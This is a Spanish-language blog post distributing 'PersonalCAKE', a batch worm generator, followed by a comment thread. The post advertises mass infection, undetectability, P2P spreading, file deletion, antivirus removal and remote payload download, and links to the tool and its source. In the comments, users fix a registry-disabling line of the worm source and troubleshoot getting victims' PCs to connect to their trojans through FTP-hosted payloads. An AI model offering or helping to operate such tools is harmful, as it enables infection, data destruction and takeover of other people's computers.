PersonalCAKE es una version mejorada por Blu3 l0llip0p del famoso Generador de Worms 3sk0r8ut0 de hendrix.
Es ideal para infectar pcs masivamente, es totalmente indetectable y durara mucho tiempo sin que lo detecten ya que esta hecho en batch, a continuacion le detallo sus caracteristicas:
1. Propagacion por P2P
2. Mensage al iniciarse
3. Agregarse al Registro
4. Infectar archivos .rar
5. Borrar archivos
6. Manipular red LAN
7. Añadir Usuario y Pass
8. Copiarse y Ocultarse
9. Descargar archivo en la victima
10. Crear muchas carpetas en el HD de la victima
11. Apagar el PC de la victima en x segundos
12. Reiniciar el PC de la victima en x segundos
13. Incluir codigo de virus
14. Bloquear Crtl+Alt+Sup
15. Borrar AV
16. Informacion adicional
17. Salir
Usenlo con cuidado y bajo su propia responsabilidad, tengan en cuenta que se propaga muy rapidamente y por lo tanto se puede tornar incontrolable.
Descarga:
personalCAKE (rapidshare)
personalCAKE (megaupload)
Manual:
Manual del generador de Worms de Hendrix
Codigo fuente:
Source personalCAKE (desde el blog)
Source personalCAKE (descarga .txt)
Entradas
26 comentarios:
alguien lo uso??
yo lo use al de hendrix, y creo que es uno de los mejores worm que existen, este debe ser mejor
yo lo probe a los 2 y este tiene unas cuantas funciones mas q el escarobuto o como se llame y es indetectable...
DEJEN COMENTARIOS SOBRE EL PROGRAMA!!!
como lo tngo q usar? abro el archivo o lo junto con mi server o q?¿
fijate en el manual de hendrix, para que se propague tu server tenes que poner los datos de ftp en la opcion que dice descargar archivo
esta linea del source esta mal, no he revisado lo demás.
echo reg add hkcu \software\windows\currentversion\policies\system /v disableregistrytools /t reg dword /d "1" /f >> C:\%name%.bat
debe ser:
echo reg add hkcu \software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f >> C:\%name%.bat
le hacia falta la rama microsoft y el guion bajo a reg_dword
saludos
mramirezc84
ya lo probe con 2 victimas con el worm y no me conectan el troyano solo si me conecta (el q le puse q se descargara) se puede hacer algo¿?
capas q pusiste mal los datos de ftp o que pusiste q no se ejecutara
Puse bien el ftp de hecho es de iespaña y el troyano si me conecta!!
proba con miarroba.com y subi el notepad.exe y probalo, el ftp host de miarroba es ftp.webcindario.com. lo primero q tenes q probar es q funcione el ftp
Si si si me sirve el link de mi troyano.
PD:oye tengo q subir un notepad?
te digo para q pruebes el notepad que no afecta nada, cuando te infectas muchas veces con un mismo troyano, deja de funcionar porq se satura de conexiones
Ya probe haciendo el eorm con miarroba pero sige sin conectarme la victima ya le subi el worm (la victima no tiene Av)
lo probaste con vos mismo?
no lo probe con 1 victima del poison y el worm tiene el bifrost pero no conecta
ya te dije probalo con vos mismo con el notepad o con la calculadora de win, despues proba con el troyano
pero no me infectaria como con gusano¿
pero si en la pc victima
pro si con el troyano no me va como me funcionara con un Notepad
UHHHH anonimoooooo te dije q probes si funciona con el notepad o cualkier archivo inofensivo en la pc de tu victima, si ves q se abre el notepad funciona bien y listo, lo modificas y le pones tu server, capas q es el server el q falla no el worm, q se yo
Pues como te comente el server me pudo autoinfectar y me va de 10
PD:oye utilise miarroba pero no tardaron mas de 1 dia en mandarme un e-mail q la extencion no se permite
PD":q otro FTP me recomendarias?=
helos varon matador che como hago para hacer andar tu prog.????
no le entiendo nada si no es joder explicalo mejor gracias
he probado el primero generador y si funciona excelente pero en el caso del segundo no me guarda el worm que podria ser lo que este fallando o que parte del codigo es donde se le da la direccion donde queremos que se guarde
Para que el worm se empiece a propagar primer lo tengo que ejecutar en alguna pc, obviamente q no sea la mia no?...o ya de por si una ves creado se empieza a propagar por p2p sin q haya sido ejecutado?
falta desactivar los antivirus
para q el worm se propague es nesesario q se ejecute en varias pcs
Publicar un comentario en la entrada